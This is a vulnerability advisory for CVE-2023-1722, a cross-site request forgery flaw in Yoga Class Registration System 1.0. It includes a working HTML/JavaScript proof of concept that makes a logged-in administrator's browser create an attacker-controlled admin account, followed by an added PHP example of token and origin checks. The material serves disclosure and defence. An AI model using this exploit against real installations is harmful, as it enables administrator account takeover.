CVE-2023-1722: Yoga Class Registration System 1.0 - ATO | Advisories | Fluid Attacks
Summary
Name
Yoga Class Registration System 1.0 - CSRF
Code name
Wyckoff
Product
Yoga Class Registration System
Affected versions
Version 1.0
State
Public
Release date
2023-06-23
Vulnerability
Kind
Cross-site request forgery
Rule
007. Cross-site request forgery
Remote
Yes
CVSSv3 Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
CVSSv3 Base Score
6.5
Exploit available
Yes
CVE ID(s)
CVE-2023-1722
Description
Yoga Class Registration System Version 1.0 allows an external attacker to elevate privileges in the application. This is possible because the application is not protected against CSRF attacks.
Vulnerability
The application is not protected against CSRF attacks: the user-management endpoint (classes/Users.php?f=save) accepts a state-changing POST with no anti-CSRF token and no check of the request's origin, relying only on the session cookie, which the browser attaches to cross-site requests as well. An attacker who lures an authenticated administrator to a page under their control can therefore make the administrator's browser create a new account with administrative permissions and credentials chosen by the attacker.
Exploitation
To exploit the vulnerability, I wrote the following proof of concept. It is served from an attacker-controlled page; when a logged-in administrator opens it and clicks the button, their browser sends the forged request below to the vulnerable endpoint with the session cookie attached:
<!DOCTYPE html>
<html>
<body>
<script>
// CSRF proof of concept: replays the multipart "save user" request from the
// victim administrator's browser, with the victim's session cookie attached.
function submitRequest()
{
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http:\/\/retr02332.com\/php-ycrs\/classes\/Users.php?f=save", true);
    // Accept, Accept-Language and a multipart/form-data Content-Type are
    // CORS-safelisted, so the browser sends no preflight: the request reaches
    // the server as an ordinary form post.
    xhr.setRequestHeader("Accept", "*\/*");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------426135374114296864734166274622");
    // Send the victim's cookies (the administrator session) with the cross-site request.
    xhr.withCredentials = true;
    // Empty "id" = create a new user; "type" 1 = administrative account;
    // username/password are chosen by the attacker.
    var body = "-----------------------------426135374114296864734166274622\r\n" +
        "Content-Disposition: form-data; name=\"id\"\r\n" +
        "\r\n" +
        "\r\n" +
        "-----------------------------426135374114296864734166274622\r\n" +
        "Content-Disposition: form-data; name=\"firstname\"\r\n" +
        "\r\n" +
        "test\r\n" +
        "-----------------------------426135374114296864734166274622\r\n" +
        "Content-Disposition: form-data; name=\"middlename\"\r\n" +
        "\r\n" +
        "test\r\n" +
        "-----------------------------426135374114296864734166274622\r\n" +
        "Content-Disposition: form-data; name=\"lastname\"\r\n" +
        "\r\n" +
        "test\r\n" +
        "-----------------------------426135374114296864734166274622\r\n" +
        "Content-Disposition: form-data; name=\"username\"\r\n" +
        "\r\n" +
        "test\r\n" +
        "-----------------------------426135374114296864734166274622\r\n" +
        "Content-Disposition: form-data; name=\"password\"\r\n" +
        "\r\n" +
        "test\r\n" +
        "-----------------------------426135374114296864734166274622\r\n" +
        "Content-Disposition: form-data; name=\"type\"\r\n" +
        "\r\n" +
        "1\r\n" +
        "-----------------------------426135374114296864734166274622\r\n" +
        "Content-Disposition: form-data; name=\"img\"; filename=\"\"\r\n" +
        "Content-Type: application/octet-stream\r\n" +
        "\r\n" +
        "\r\n" +
        "-----------------------------426135374114296864734166274622--\r\n";
    // Send the body byte-for-byte so the boundary and CRLFs are preserved.
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
    <input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Evidence of exploitation
Our security policy
We have reserved CVE-2023-1722 to refer to this issue from now on.
- https://fluidattacks.com/advisories/policy/
System Information
Version: Yoga Class Registration System 1.0
Operating System: GNU/Linux
Mitigation
There is currently no patch available for this vulnerability.
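Since no vendor patch exists, the following is an added example (not the vendor's code and not part of the original advisory) of the server-side checks that the vulnerable save-user action described in the Vulnerability section lacks: a per-session synchronizer token verified in constant time, an Origin/Referer check, and a SameSite session cookie as defence in depth. It is written in PHP because that is the language of the affected application. The field names (firstname, username, password, type) are taken from the forged request above; the csrf_token field name, the session array layout, the expected host and the constructed attacker.example origin are assumptions made for this illustration.

```php
<?php
declare(strict_types=1);

// Added example, not the vendor's code: the checks a hardened "save user"
// handler needs. Field names (firstname, username, password, type) come from
// the forged request in the advisory; the csrf_token field name, the session
// layout, the host and attacker.example are assumptions for this illustration.

// Defence in depth: with SameSite=Lax the session cookie is not attached to a
// cross-site POST, so the forged request would arrive unauthenticated.
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);

// One synchronizer token per session, created on first use.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden input for the user form rendered to the administrator; a page on
// another origin cannot read this value, so it cannot forge a valid POST.
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time comparison; a missing token or missing session copy fails closed.
function csrf_token_is_valid(array $session, ?string $submitted): bool
{
    if ($submitted === null || empty($session['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], $submitted);
}

// Independent check: browsers attach Origin to cross-site POSTs, so a foreign
// or absent Origin/Referer is rejected.
function request_origin_is_allowed(array $server, string $expectedHost): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($source === null) {
        return false;
    }
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// The save action. Returns the row that would be inserted, or the rejection.
function save_user(array $post, array $server, array $session, string $expectedHost): array
{
    if (!request_origin_is_allowed($server, $expectedHost)) {
        return ['status' => 'failed', 'msg' => 'Cross-site request rejected (origin)'];
    }
    if (!csrf_token_is_valid($session, $post['csrf_token'] ?? null)) {
        return ['status' => 'failed', 'msg' => 'Cross-site request rejected (token)'];
    }
    return [
        'status' => 'success',
        'row' => [
            'firstname' => trim((string)($post['firstname'] ?? '')),
            'username'  => trim((string)($post['username'] ?? '')),
            'password'  => password_hash((string)($post['password'] ?? ''), PASSWORD_DEFAULT),
            'type'      => (int)($post['type'] ?? 0),
        ],
    ];
}

// Constructed requests for the demonstration (not captured traffic).
$session   = ['login_id' => 1];
$formToken = csrf_token($session);
$fields    = ['firstname' => 'test', 'username' => 'test', 'password' => 'test', 'type' => '1'];

// 1. The forged request from the proof of concept: foreign origin, no token.
$forged = save_user($fields, ['HTTP_ORIGIN' => 'https://attacker.example'], $session, 'retr02332.com');

// 2. The administrator's own form submission: same host, valid token.
$legit = save_user($fields + ['csrf_token' => $formToken], ['HTTP_ORIGIN' => 'http://retr02332.com'], $session, 'retr02332.com');

echo csrf_field($session), PHP_EOL;
echo $forged['msg'], PHP_EOL;
echo $legit['status'], PHP_EOL;
```

The token check is the primary control; the Origin check and the SameSite cookie are independent layers so that a single mistake (a form that forgets the hidden field, a browser that strips Referer) does not reopen the issue. Both checks fail closed, which means that any same-site form that submits to this endpoint must include the hidden field produced by csrf_field(); in the real application the session array would be $_SESSION and the row would be written to the database instead of returned.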
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks’ Offensive Team.
References
Vendor page https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
Timeline
2023-03-31
Vulnerability discovered.
2023-03-31
Vendor contacted.
2023-03-31
Vendor replied acknowledging the report.
2023-06-23
Public Disclosure.
Related news
Yoga Class Registration System version 1.0 allows an administrator to execute commands on the server. This is possible because the application does not correctly validate the thumbnails of the classes uploaded by the administrators.